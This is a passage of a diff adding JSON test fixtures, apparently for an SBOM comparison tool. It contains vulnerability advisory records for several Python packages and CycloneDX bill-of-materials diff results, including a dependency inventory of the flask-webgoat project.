`verify=False` is used.  ### Related Links * https://github.com/psf/requests/pull/6655"}], "product_status": {"known_affected": ["requests@vers:pypi/>=0.0.0|<2.32.0"], "known_not_affected": ["requests@2.32.0"]}, "references": [{"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/IYLSNK5TL46Q6XPRVMHVWS63MVJQOK4Q"}, {"summary": "CVE Record", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-35195"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/N7WP6EYDSUOCOJYHDK5NX43PYZ4SNHGZ"}, {"summary": "GitHub Advisory GHSA-9wx4-h78v-vm56", "url": "https://github.com/psf/requests/security/advisories/GHSA-9wx4-h78v-vm56"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/IYLSNK5TL46Q6XPRVMHVWS63MVJQOK4Q"}, {"summary": "Cve 2024", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-35195"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/N7WP6EYDSUOCOJYHDK5NX43PYZ4SNHGZ"}, {"summary": "GitHub Advisory GHSA-9wx4-h78v-vm56", "url": "https://github.com/psf/requests/security/advisories/GHSA-9wx4-h78v-vm56"}], "scores": [{"cvss_v3": {"attackComplexity": "HIGH", "attackVector": "LOCAL", "availabilityImpact": "NONE", "baseScore": 5.6, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "environmentalScore": 5.6, "environmentalSeverity": "MEDIUM", "integrityImpact": "HIGH", "modifiedAttackComplexity": "HIGH", "modifiedAttackVector": "LOCAL", "modifiedAvailabilityImpact": "NONE", "modifiedConfidentialityImpact": "HIGH", "modifiedIntegrityImpact": "HIGH", "modifiedPrivilegesRequired": "HIGH", "modifiedScope": "UNCHANGED", "modifiedUserInteraction": "REQUIRED", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "temporalScore": 5.6, "temporalSeverity": "MEDIUM", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:N", "version": "3.1"}, "products": ["requests@vers:pypi/>=0.0.0|<2.32.0"]}], "title": "CVE-2024-35195/pkg:pypi/requests@2.31.0"}, {"acknowledgements": [{"organization": "NVD", "urls": ["https://nvd.nist.gov/vuln/detail/CVE-2024-3651"]}], "cve": "CVE-2024-3651", "cwe": {"id": "400", "name": "Uncontrolled Resource Consumption"}, "discovery_date": "2024-04-11T21:32:40", "ids": [{"system_name": "Huntr Advisory", "text": "93d78d07-d791-4b39-a845-cbfabc44aadb"}, {"system_name": "CVE Record", "text": "CVE-2024-3651"}, {"system_name": "GitHub Advisory", "text": "GHSA-jjg7-2v4v-x38h"}, {"system_name": "GitHub Advisory", "text": "PYSEC-2024-60"}], "notes": [{"category": "description", "details": "Vulnerability Description", "text": "Internationalized Domain Names in Applications (IDNA) vulnerable to denial of service from specially crafted inputs to idna.encode"}, {"category": "details", "details": "Vulnerability Details", "text": "# Internationalized Domain Names in Applications (IDNA) vulnerable to denial of service from specially crafted inputs to idna.encode ### Impact A specially crafted argument to the `idna.encode()` function could consume significant resources. This may lead to a denial-of-service.  ### Patches The function has been refined to reject such strings without the associated resource consumption in version 3.7.  ### Workarounds Domain names cannot exceed 253 characters in length, if this length limit is enforced prior to passing the domain to the `idna.encode()` function it should no longer consume significant resources. This is triggered by arbitrarily large inputs that would not occur in normal usage, but may be passed to the library assuming there is no preliminary input validation by the higher-level application.  ### References * https://huntr.com/bounties/93d78d07-d791-4b39-a845-cbfabc44aadb  ## Related CVE(s) CVE-2024-3651, PYSEC-2024-60"}], "product_status": {"known_affected": ["idna@vers:pypi/>=0.1|<=3.6"]}, "references": [{"summary": "GitHub Advisory PYSEC-2024-60", "url": "https://github.com/pypa/advisory-database/tree/main/vulns/idna/PYSEC-2024-60.yaml"}, {"summary": "Huntr Advisory 93d78d07-d791-4b39-a845-cbfabc44aadb", "url": "https://huntr.com/bounties/93d78d07-d791-4b39-a845-cbfabc44aadb"}, {"summary": "CVE Record", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-3651"}, {"summary": "GitHub Advisory GHSA-jjg7-2v4v-x38h", "url": "https://github.com/kjd/idna/security/advisories/GHSA-jjg7-2v4v-x38h"}, {"summary": "GitHub Advisory PYSEC-2024-60", "url": "https://github.com/pypa/advisory-database/tree/main/vulns/idna/PYSEC-2024-60.yaml"}, {"summary": "Huntr Advisory 93d78d07-d791-4b39-a845-cbfabc44aadb", "url": "https://huntr.com/bounties/93d78d07-d791-4b39-a845-cbfabc44aadb"}, {"summary": "Cve 2024", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-3651"}, {"summary": "GitHub Advisory GHSA-jjg7-2v4v-x38h", "url": "https://github.com/kjd/idna/security/advisories/GHSA-jjg7-2v4v-x38h"}], "scores": [{"cvss_v3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 6.2, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "environmentalScore": 6.2, "environmentalSeverity": "MEDIUM", "integrityImpact": "NONE", "modifiedAttackComplexity": "LOW", "modifiedAttackVector": "LOCAL", "modifiedAvailabilityImpact": "HIGH", "modifiedConfidentialityImpact": "NONE", "modifiedIntegrityImpact": "NONE", "modifiedPrivilegesRequired": "NONE", "modifiedScope": "UNCHANGED", "modifiedUserInteraction": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "temporalScore": 6.2, "temporalSeverity": "MEDIUM", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1"}, "products": ["idna@vers:pypi/>=0.1|<=3.6"]}], "title": "CVE-2024-3651/pkg:pypi/idna@3.4"}, {"acknowledgements": [{"organization": "NVD", "urls": ["https://nvd.nist.gov/vuln/detail/CVE-2024-37891"]}], "cve": "CVE-2024-37891", "cwe": {"id": "669", "name": "Incorrect Resource Transfer Between Spheres"}, "discovery_date": "2024-06-17T21:37:20", "ids": [{"system_name": "CVE Record", "text": "CVE-2024-37891"}, {"system_name": "GitHub Advisory", "text": "GHSA-34jh-p97f-mpxf"}], "notes": [{"category": "description", "details": "Vulnerability Description", "text": "urllib3's Proxy-Authorization request header isn't stripped during cross-origin redirects "}, {"category": "details", "details": "Vulnerability Details", "text": "# urllib3's Proxy-Authorization request header isn't stripped during cross-origin redirects  When using urllib3's proxy support with `ProxyManager`, the `Proxy-Authorization` header is only sent to the configured proxy, as expected.  However, when sending HTTP requests *without* using urllib3's proxy support, it's possible to accidentally configure the `Proxy-Authorization` header even though it won't have any effect as the request is not using a forwarding proxy or a tunneling proxy. In those cases, urllib3 doesn't treat the `Proxy-Authorization` HTTP header as one carrying authentication material and thus doesn't strip the header on cross-origin redirects.  Because this is a highly unlikely scenario, we believe the severity of this vulnerability is low for almost all users. Out of an abundance of caution urllib3 will automatically strip the `Proxy-Authorization` header during cross-origin redirects to avoid the small chance that users are doing this on accident.  Users should use urllib3's proxy support or disable automatic redirects to achieve safe processing of the `Proxy-Authorization` header, but we still decided to strip the header by default in order to further protect users who aren't using the correct approach.  ## Affected usages  We believe the number of usages affected by this advisory is low. It requires all of the following to be true to be exploited:  * Setting the `Proxy-Authorization` header without using urllib3's built-in proxy support. * Not disabling HTTP redirects. * Either not using an HTTPS origin server or for the proxy or target origin to redirect to a malicious origin.  ## Remediation  * Using the `Proxy-Authorization` header with urllib3's `ProxyManager`. * Disabling HTTP redirects using `redirects=False` when sending requests. * Not using the `Proxy-Authorization` header."}], "product_status": {"known_affected": ["urllib3@vers:pypi/>=2.0.0|<2.2.2"], "known_not_affected": ["urllib3@2.2.2"]}, "references": [{"summary": "CVE Record", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-37891"}, {"summary": "GitHub Advisory GHSA-34jh-p97f-mpxf", "url": "https://github.com/urllib3/urllib3/security/advisories/GHSA-34jh-p97f-mpxf"}, {"summary": "Cve 2024", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-37891"}, {"summary": "GitHub Advisory GHSA-34jh-p97f-mpxf", "url": "https://github.com/urllib3/urllib3/security/advisories/GHSA-34jh-p97f-mpxf"}], "scores": [{"cvss_v3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "environmentalScore": 4.4, "environmentalSeverity": "MEDIUM", "integrityImpact": "NONE", "modifiedAttackComplexity": "HIGH", "modifiedAttackVector": "NETWORK", "modifiedAvailabilityImpact": "NONE", "modifiedConfidentialityImpact": "HIGH", "modifiedIntegrityImpact": "NONE", "modifiedPrivilegesRequired": "HIGH", "modifiedScope": "UNCHANGED", "modifiedUserInteraction": "NONE", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "temporalScore": 4.4, "temporalSeverity": "MEDIUM", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:N/A:N", "version": "3.1"}, "products": ["urllib3@vers:pypi/>=2.0.0|<2.2.2"]}], "title": "CVE-2024-37891/pkg:pypi/urllib3@2.0.4"}, {"acknowledgements": [{"organization": "NVD", "urls": ["https://nvd.nist.gov/vuln/detail/CVE-2024-39689"]}], "cve": "CVE-2024-39689", "cwe": {"id": "345", "name": "Insufficient Verification of Data Authenticity"}, "discovery_date": "2024-07-05T20:06:40", "ids": [{"system_name": "CVE Record", "text": "CVE-2024-39689"}, {"system_name": "GitHub Advisory", "text": "GHSA-248v-346w-9cwc"}], "notes": [{"category": "description", "details": "Vulnerability Description", "text": "Certifi removes GLOBALTRUST root certificate"}, {"category": "details", "details": "Vulnerability Details", "text": "# Certifi removes GLOBALTRUST root certificate Certifi 2024.07.04 removes root certificates from \"GLOBALTRUST\" from the root store. These are in the process of being removed from Mozilla's trust store.  GLOBALTRUST's root certificates are being removed pursuant to an investigation which identified \"long-running and unresolved compliance issues\". Conclusions of Mozilla's investigation can be found [here]( https://groups.google.com/a/mozilla.org/g/dev-security-policy/c/XpknYMPO8dI)."}], "product_status": {"known_affected": ["certifi@vers:pypi/>=2021.05.30|<2024.07.04"], "known_not_affected": ["certifi@2024.07.04"]}, "references": [{"summary": "GitHub Advisory GHSA-248v-346w-9cwc", "url": "https://github.com/certifi/python-certifi/security/advisories/GHSA-248v-346w-9cwc"}, {"summary": "Google Mailing List", "url": "https://groups.google.com/a/mozilla.org/g/dev-security-policy/c/XpknYMPO8dI"}, {"summary": "CVE Record", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-39689"}, {"summary": "GitHub Advisory GHSA-248v-346w-9cwc", "url": "https://github.com/certifi/python-certifi/security/advisories/GHSA-248v-346w-9cwc"}, {"summary": "Cve 2024", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-39689"}], "scores": [{"cvss_v3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 3.1, "baseSeverity": "LOW", "confidentialityImpact": "LOW", "environmentalScore": 3.1, "environmentalSeverity": "LOW", "integrityImpact": "NONE", "modifiedAttackComplexity": "HIGH", "modifiedAttackVector": "NETWORK", "modifiedAvailabilityImpact": "NONE", "modifiedConfidentialityImpact": "LOW", "modifiedIntegrityImpact": "NONE", "modifiedPrivilegesRequired": "NONE", "modifiedScope": "UNCHANGED", "modifiedUserInteraction": "REQUIRED", "privilegesRequired": "NONE", "scope": "UNCHANGED", "temporalScore": 3.1, "temporalSeverity": "LOW", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N", "version": "3.1"}, "products": ["certifi@vers:pypi/>=2021.05.30|<2024.07.04"]}], "title": "CVE-2024-39689/pkg:pypi/certifi@2023.7.22"}, {"acknowledgements": [{"organization": "NVD", "urls": ["https://nvd.nist.gov/vuln/detail/CVE-2024-5569"]}], "cve": "CVE-2024-5569", "cwe": {"id": "400", "name": "Uncontrolled Resource Consumption"}, "discovery_date": "2024-07-09T00:31:40", "ids": [{"system_name": "CVE Record", "text": "CVE-2024-5569"}, {"system_name": "Huntr Advisory", "text": "be898306-11f9-46b4-b28c-f4c4aa4ffbae"}], "notes": [{"category": "description", "details": "Vulnerability Description", "text": "zipp Denial of Service vulnerability"}, {"category": "details", "details": "Vulnerability Details", "text": "# zipp Denial of Service vulnerability A Denial of Service (DoS) vulnerability exists in the jaraco/zipp library, affecting all versions prior to 3.19.1. The vulnerability is triggered when processing a specially crafted zip file that leads to an infinite loop. This issue also impacts the zipfile module of CPython, as features from the third-party zipp library are later merged into CPython, and the affected code is identical in both projects. The infinite loop can be initiated through the use of functions affecting the `Path` module in both zipp and zipfile, such as `joinpath`, the overloaded division operator, and `iterdir`. Although the infinite loop is not resource exhaustive, it prevents the application from responding. The vulnerability was addressed in version 3.19.1 of jaraco/zipp."}], "product_status": {"known_affected": ["zipp@vers:pypi/>=0.1.0|<=3.19.0"], "known_not_affected": ["zipp@3.19.1"]}, "references": [{"summary": "Huntr Advisory be898306-11f9-46b4-b28c-f4c4aa4ffbae", "url": "https://huntr.com/bounties/be898306-11f9-46b4-b28c-f4c4aa4ffbae"}, {"summary": "CVE Record", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-5569"}, {"summary": "Huntr Advisory be898306-11f9-46b4-b28c-f4c4aa4ffbae", "url": "https://huntr.com/bounties/be898306-11f9-46b4-b28c-f4c4aa4ffbae"}, {"summary": "Cve 2024", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-5569"}], "scores": [{"cvss_v3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 6.2, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "environmentalScore": 6.2, "environmentalSeverity": "MEDIUM", "integrityImpact": "NONE", "modifiedAttackComplexity": "LOW", "modifiedAttackVector": "LOCAL", "modifiedAvailabilityImpact": "HIGH", "modifiedConfidentialityImpact": "NONE", "modifiedIntegrityImpact": "NONE", "modifiedPrivilegesRequired": "NONE", "modifiedScope": "UNCHANGED", "modifiedUserInteraction": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "temporalScore": 6.2, "temporalSeverity": "MEDIUM", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0"}, "products": ["zipp@vers:pypi/>=0.1.0|<=3.19.0"]}], "title": "CVE-2024-5569/pkg:pypi/zipp@3.16.2"}]}}}
\ No newline at end of file
+{"result_1": {"diff_summary": {"bom_1.json": {"components": {"libraries": [{"bom-ref": "pkg:maven/joda-time/joda-time@2.9.9?type=jar", "type": "library", "description": "Date and time library to replace JDK date handling", "group": "joda-time", "name": "joda-time", "publisher": "Joda.org", "purl": "pkg:maven/joda-time/joda-time@2.9.9?type=jar", "scope": "required", "version": "2.9.9"}]}}, "bom_2.json": {"components": {"libraries": [{"bom-ref": "pkg:maven/joda-time/joda-time@2.9.9?type=jar", "type": "library", "group": "joda-time", "name": "joda-time", "publisher": "Joda.org", "purl": "pkg:maven/joda-time/joda-time@2.9.9?type=jar", "scope": "required", "version": "2.9.9"}]}}}, "common_summary": {"components": {"frameworks": [{"bom-ref": "pkg:maven/org.springframework.cloud/spring-cloud-starter-config@2.0.0.RELEASE?type=jar", "type": "framework", "group": "org.springframework.cloud", "name": "spring-cloud-starter-config", "publisher": "Pivotal Software, Inc.", "purl": "pkg:maven/org.springframework.cloud/spring-cloud-starter-config@2.0.0.RELEASE?type=jar", "scope": "required", "version": "2.0.0.RELEASE"}]}}}, "result_10": {"bomFormat": "CycloneDX", "components": [{"bom-ref": "pkg:pypi/flask@1.1.2", "evidence": {"identity": {"confidence": 1, "field": "purl", "methods": [{"confidence": 1, "technique": "instrumentation", "value": "C:\\Users\\user\\PycharmProjects\\flask-webgoat\\venv"}]}, "occurrences": [{"location": "flask_webgoat\\__init__.py#20"}, {"location": "flask_webgoat\\actions.py#13"}, {"location": "flask_webgoat\\actions.py#16"}, {"location": "flask_webgoat\\actions.py#19"}, {"location": "flask_webgoat\\actions.py#22"}, {"location": "flask_webgoat\\actions.py#34"}, {"location": "flask_webgoat\\actions.py#4"}, {"location": "flask_webgoat\\actions.py#46"}, {"location": "flask_webgoat\\actions.py#49"}, {"location": "flask_webgoat\\actions.py#6"}, {"location": "flask_webgoat\\actions.py#7"}, {"location": "flask_webgoat\\auth.py#13"}, {"location": "flask_webgoat\\auth.py#23"}, {"location": "flask_webgoat\\auth.py#25"}, {"location": "flask_webgoat\\auth.py#35"}, {"location": "flask_webgoat\\auth.py#4"}, {"location": "flask_webgoat\\auth.py#44"}, {"location": "flask_webgoat\\auth.py#46"}, {"location": "flask_webgoat\\status.py#13"}, {"location": "flask_webgoat\\status.py#3"}, {"location": "flask_webgoat\\status.py#8"}, {"location": "flask_webgoat\\ui.py#14"}, {"location": "flask_webgoat\\ui.py#19"}, {"location": "flask_webgoat\\ui.py#24"}, {"location": "flask_webgoat\\ui.py#6"}, {"location": "flask_webgoat\\users.py#14"}, {"location": "flask_webgoat\\users.py#18"}, {"location": "flask_webgoat\\users.py#24"}, {"location": "flask_webgoat\\users.py#3"}, {"location": "flask_webgoat\\users.py#33"}, {"location": "flask_webgoat\\users.py#44"}, {"location": "flask_webgoat\\users.py#46"}, {"location": "flask_webgoat\\users.py#7"}]}, "name": "flask", "properties": [{"name": "ImportedModules", "value": "flask.redirect,flask.render_template,flask.jsonify,flask.Blueprint,flask.session,flask.g,flask.request,flask.Flask"}], "purl": "pkg:pypi/flask@1.1.2", "type": "framework", "version": "1.1.2"}, {"bom-ref": "pkg:pypi/werkzeug@1.0.1", "evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "manifest-analysis", "value": "C:\\Users\\user\\PycharmProjects\\flask-webgoat\\requirements.txt"}]}}, "name": "Werkzeug", "properties": [{"name": "SrcFile", "value": "C:\\Users\\user\\PycharmProjects\\flask-webgoat\\requirements.txt"}], "purl": "pkg:pypi/werkzeug@1.0.1", "type": "library", "version": "1.5.1"}, {"bom-ref": "pkg:pypi/jinja2@2.11.3", "evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "manifest-analysis", "value": "C:\\Users\\user\\PycharmProjects\\flask-webgoat\\requirements.txt"}]}}, "name": "Jinja2", "properties": [{"name": "SrcFile", "value": "C:\\Users\\user\\PycharmProjects\\flask-webgoat\\requirements.txt"}], "purl": "pkg:pypi/jinja2@2.11.3", "type": "library", "version": "2.10.2"}, {"bom-ref": "pkg:pypi/markupsafe@1.1.1", "evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "manifest-analysis", "value": "C:\\Users\\user\\PycharmProjects\\flask-webgoat\\requirements.txt"}]}}, "name": "MarkupSafe", "properties": [{"name": "SrcFile", "value": "C:\\Users\\user\\PycharmProjects\\flask-webgoat\\requirements.txt"}], "purl": "pkg:pypi/markupsafe@1.1.1", "type": "library", "version": "1.1.1"}, {"bom-ref": "pkg:pypi/itsdangerous@1.1.0", "evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "manifest-analysis", "value": "C:\\Users\\user\\PycharmProjects\\flask-webgoat\\requirements.txt"}]}}, "name": "itsdangerous", "properties": [{"name": "SrcFile", "value": "C:\\Users\\user\\PycharmProjects\\flask-webgoat\\requirements.txt"}], "purl": "pkg:pypi/itsdangerous@1.1.0", "type": "library", "version": "1.1.0"}, {"bom-ref": "pkg:pypi/click@7.1.2", "evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "manifest-analysis", "value": "C:\\Users\\user\\PycharmProjects\\flask-webgoat\\requirements.txt"}]}}, "name": "click", "properties": [{"name": "SrcFile", "value": "C:\\Users\\user\\PycharmProjects\\flask-webgoat\\requirements.txt"}], "purl": "pkg:pypi/click@7.1.2", "type": "library", "version": "7.1.2"}, {"bom-ref": "pkg:github/actions/checkout@v2", "group": "actions", "name": "checkout", "purl": "pkg:github/actions/checkout@v2", "type": "application", "version": "v2"}, {"bom-ref": "pkg:github/actions/setup-python@v2", "group": "actions", "name": "setup-python", "purl": "pkg:github/actions/setup-python@v2", "type": "application", "version": "v2"}], "dependencies": [{"dependsOn": ["pkg:pypi/flask@1.1.2"], "ref": "pkg:pypi/flask-webgoat@latest"}, {"dependsOn": [], "ref": "pkg:pypi/werkzeug@1.0.1"}, {"dependsOn": ["pkg:pypi/markupsafe@1.1.1"], "ref": "pkg:pypi/jinja2@2.11.3"}, {"dependsOn": [], "ref": "pkg:pypi/markupsafe@1.1.1"}, {"dependsOn": [], "ref": "pkg:pypi/itsdangerous@1.1.0"}, {"dependsOn": [], "ref": "pkg:pypi/click@7.1.2"}, {"dependsOn": ["pkg:pypi/click@7.1.2", "pkg:pypi/itsdangerous@1.1.0", "pkg:pypi/jinja2@2.11.3", "pkg:pypi/werkzeug@1.0.1"], "ref": "pkg:pypi/flask@1.1.2"}], "metadata": {"authors": [{"name": "OWASP Foundation"}], "component": {"bom-ref": "pkg:gem/flask-webgoat@latest", "name": "flask-webgoat", "purl": "pkg:gem/flask-webgoat@latest", "type": "application", "version": "latest"}, "lifecycles": [{"phase": "build"}], "tools": {"components": [{"author": "OWASP Foundation", "bom-ref": "pkg:npm/@cyclonedx/cdxgen@10.2.1", "group": "@cyclonedx", "name": "cdxgen", "publisher": "OWASP Foundation", "purl": "pkg:npm/%40cyclonedx/cdxgen@10.2.1", "type": "application", "version": "10.2.1"}]}}, "services": [{"authenticated": false, "endpoints": ["/grep_processes", "/message"], "name": "actions-service"}, {"authenticated": false, "endpoints": ["/login", "/login_and_redirect"], "name": "auth-service"}, {"authenticated": false, "endpoints": ["/ping", "/status"], "name": "status-service"}, {"authenticated": false, "endpoints": ["/search"], "name": "ui-service"}, {"authenticated": false, "endpoints": ["/create_user"], "name": "users-service"}], "specVersion": "1.5", "version": 2}, "result_11": {"components": [{"version": "1.0.1"}, {"version": "2.11.3"}, {"bom-ref": "pkg:pypi/markupsafe@1.1.1", "name": "MarkupSafe", "purl": "pkg:pypi/markupsafe@1.1.1", "version": "1.1.1"}, {"bom-ref": "pkg:pypi/itsdangerous@1.1.0", "name": "itsdangerous", "purl": "pkg:pypi/itsdangerous@1.1.0", "version": "1.1.0"}, {"bom-ref": "pkg:pypi/click@7.1.2", "name": "click", "purl": "pkg:pypi/click@7.1.2", "version": "7.1.2"}], "dependencies": [{"ref": "pkg:pypi/itsdangerous@1.1.0"}, {"ref": "pkg:pypi/click@7.1.2"}, {"dependsOn": ["pkg:pypi/click@7.1.2", "pkg:pypi/itsdangerous@1.1.0", "pkg:pypi/jinja2@2.11.3", "pkg:pypi/werkzeug@1.0.1"], "ref": "pkg:pypi/flask@1.1.2"}], "services": [{"endpoints": ["/create_user"], "name": "users-service"}]}, "result_12": {"bomFormat": "CycloneDX", "components": [{"bom-ref": "pkg:pypi/flask@1.1.2", "evidence": {"identity": {"confidence": 1, "field": "purl", "methods": [{"confidence": 1, "technique": "instrumentation", "value": "C:\\Users\\user\\PycharmProjects\\flask-webgoat\\venv"}]}, "occurrences": [{"location": "flask_webgoat\\__init__.py#20"}, {"location": "flask_webgoat\\actions.py#13"}, {"location": "flask_webgoat\\actions.py#16"}, {"location": "flask_webgoat\\actions.py#19"}, {"location": "flask_webgoat\\actions.py#22"}, {"location": "flask_webgoat\\actions.py#34"}, {"location": "flask_webgoat\\actions.py#4"}, {"location": "flask_webgoat\\actions.py#46"}, {"location": "flask_webgoat\\actions.py#49"}, {"location": "flask_webgoat\\actions.py#6"}, {"location": "flask_webgoat\\actions.py#7"}, {"location": "flask_webgoat\\auth.py#13"}, {"location": "flask_webgoat\\auth.py#23"}, {"location": "flask_webgoat\\auth.py#25"}, {"location": "flask_webgoat\\auth.py#35"}, {"location": "flask_webgoat\\auth.py#4"}, {"location": "flask_webgoat\\auth.py#44"}, {"location": "flask_webgoat\\auth.py#46"}, {"location": "flask_webgoat\\status.py#13"}, {"location": "flask_webgoat\\status.py#3"}, {"location": "flask_webgoat\\status.py#8"}, {"location": "flask_webgoat\\ui.py#14"}, {"location": "flask_webgoat\\ui.py#19"}, {"location": "flask_webgoat\\ui.py#24"}, {"location": "flask_webgoat\\ui.py#6"}, {"location": "flask_webgoat\\users.py#14"}, {"location": "flask_webgoat\\users.py#18"}, {"location": "flask_webgoat\\users.py#24"}, {"location": "flask_webgoat\\users.py#3"}, {"location": "flask_webgoat\\users.py#33"}, {"location": "flask_webgoat\\users.py#44"}, {"location": "flask_webgoat\\users.py#46"}, {"location": "flask_webgoat\\users.py#7"}]}, "name": "flask", "properties": [{"name": "ImportedModules", "value": "flask.redirect,flask.render_template,flask.jsonify,flask.Blueprint,flask.session,flask.g,flask.request,flask.Flask"}], "purl": "pkg:pypi/flask@1.1.2", "type": "framework", "version": "1.1.2"}, {"bom-ref": "pkg:pypi/werkzeug@1.0.1", "evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "manifest-analysis", "value": "C:\\Users\\user\\PycharmProjects\\flask-webgoat\\requirements.txt"}]}}, "name": "Werkzeug", "properties": [{"name": "SrcFile", "value": "C:\\Users\\user\\PycharmProjects\\flask-webgoat\\requirements.txt"}], "purl": "pkg:pypi/werkzeug@1.0.1", "type": "library"}, {"bom-ref": "pkg:pypi/jinja2@2.11.3", "evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "manifest-analysis", "value": "C:\\Users\\user\\PycharmProjects\\flask-webgoat\\requirements.txt"}]}}, "name": "Jinja2", "properties": [{"name": "SrcFile", "value": "C:\\Users\\user\\PycharmProjects\\flask-webgoat\\requirements.txt"}], "purl": "pkg:pypi/jinja2@2.11.3", "type": "library"}, {"evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "manifest-analysis", "value": "C:\\Users\\user\\PycharmProjects\\flask-webgoat\\requirements.txt"}]}}, "properties": [{"name": "SrcFile", "value": "C:\\Users\\user\\PycharmProjects\\flask-webgoat\\requirements.txt"}], "type": "library"}, {"evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "manifest-analysis", "value": "C:\\Users\\user\\PycharmProjects\\flask-webgoat\\requirements.txt"}]}}, "properties": [{"name": "SrcFile", "value": "C:\\Users\\user\\PycharmProjects\\flask-webgoat\\requirements.txt"}], "type": "library"}, {"evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "manifest-analysis", "value": "C:\\Users\\user\\PycharmProjects\\flask-webgoat\\requirements.txt"}]}}, "properties": [{"name": "SrcFile", "value": "C:\\Users\\user\\PycharmProjects\\flask-webgoat\\requirements.txt"}], "type": "library"}, {"bom-ref": "pkg:github/actions/checkout@v2", "group": "actions", "name": "checkout", "purl": "pkg:github/actions/checkout@v2", "type": "application", "version": "v2"}, {"bom-ref": "pkg:github/actions/setup-python@v2", "group": "actions", "name": "setup-python", "purl": "pkg:github/actions/setup-python@v2", "type": "application", "version": "v2"}], "dependencies": [{"dependsOn": ["pkg:pypi/flask@1.1.2"], "ref": "pkg:pypi/flask-webgoat@latest"}, {"dependsOn": [], "ref": "pkg:pypi/werkzeug@1.0.1"}, {"dependsOn": ["pkg:pypi/markupsafe@1.1.1"], "ref": "pkg:pypi/jinja2@2.11.3"}, {"dependsOn": [], "ref": "pkg:pypi/markupsafe@1.1.1"}, {"dependsOn": []}, {"dependsOn": []}], "metadata": {"authors": [{"name": "OWASP Foundation"}], "component": {"bom-ref": "pkg:gem/flask-webgoat@latest", "name": "flask-webgoat", "purl": "pkg:gem/flask-webgoat@latest", "type": "application", "version": "latest"}, "lifecycles": [{"phase": "build"}], "tools": {"components": [{"author": "OWASP Foundation", "bom-ref": "pkg:npm/@cyclonedx/cdxgen@10.2.1", "group": "@cyclonedx", "name": "cdxgen", "publisher": "OWASP Foundation", "purl": "pkg:npm/%40cyclonedx/cdxgen@10.2.1", "type": "application", "version": "10.2.1"}]}}, "services": [{"authenticated": false, "endpoints": ["/grep_processes", "/message"], "name": "actions-service"}, {"authenticated": false, "endpoints": ["/login", "/login_and_redirect"], "name": "auth-service"}, {"authenticated": false, "endpoints": ["/ping", "/status"], "name": "status-service"}, {"authenticated": false, "endpoints": ["/search"], "name": "ui-service"}, {"authenticated": false}], "specVersion": "1.5", "version": 2}, "result_2": {"diff_summary": {"bom_1.json": {"components": {"libraries": [{"bom-ref": "pkg:maven/joda-time/joda-time@2.9.9?type=jar", "type": "library", "description": "Date and time library to replace JDK date handling", "group": "joda-time", "name": "joda-time", "publisher": "Joda.org", "purl": "pkg:maven/joda-time/joda-time@2.9.9?type=jar", "scope": "required", "version": "2.9.9"}]}}, "bom_2.json": {"components": {"libraries": [{"bom-ref": "pkg:maven/joda-time/joda-time@2.8.9?type=jar", "type": "library", "description": "Date and time library to replace JDK date handling", "group": "joda-time", "name": "joda-time", "publisher": "Joda.org", "purl": "pkg:maven/joda-time/joda-time@2.8.9?type=jar", "scope": "required", "version": "2.8.9"}]}}}, "common_summary": {"components": {"frameworks": [{"bom-ref": "pkg:maven/org.springframework.cloud/spring-cloud-starter-config@2.0.0.RELEASE?type=jar", "type": "framework", "description": "Spring Cloud Starter", "group": 